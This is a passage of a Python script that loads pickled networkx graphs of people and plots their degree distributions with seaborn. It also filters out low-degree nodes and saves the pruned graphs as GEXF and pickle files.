G=pickle.load(handle)
with open(datapath+path_graphs+db2+'People'+tag+'.cnf', 'rb') as handle:
People=pickle.load(handle)
Gu.remove_node('None')
G.remove_node('None')
nu=Gu.nodes()
vu=[]
gudata=Gu.nodes.data()
for n in nu:
vu.append(Gu.degree(n))
# if 'followers' in gudata[n]:
# print('hola')
print(len(vu))
vuc=[i for i in vu if i>10]
print(len(vuc))
sns.set_style('darkgrid')
sns_plot = sns.distplot(vu)
sns_plot.figure.savefig("Gu_nodehist.png")
ns=G.nodes()
v=[]
gdata=G.nodes.data()
for n in ns:
v.append(G.out_degree(n))
# if 'followers' in gdata[n]:
# print('hola')
print(len(v))
vc=[i for i in v if i>10]
print(len(vc))
v2=[]
for n in ns:
v2.append(G.in_degree(n))
print(len(v2))
vc2=[i for i in v2 if i>10]
print(len(vc2))
sns.set_style('darkgrid')
sns_plot = sns.distplot(v)
sns_plot.figure.savefig("G_nodehist.png")
Guf=Gu.copy()
nus=Gu.nodes()
for n in nus:
dn=Gu.degree(n)
if dn<th:
Guf.remove_node(n)
Gf=G.copy()
ns=G.nodes()
for n in ns:
dn=G.out_degree(n)
if dn<th:
Gf.remove_node(n)
print(len(Guf.nodes()))
print(len(Gf.nodes()))
path_graphs = 'People/'
nx.write_gexf(Guf, datapath+path_graphs+db_name_table+'NetworkGraphPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)
nx.write_gexf(Gf, datapath+path_graphs+db_name_table+'NetworkGraphDPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL) | 2.390625 | 2 |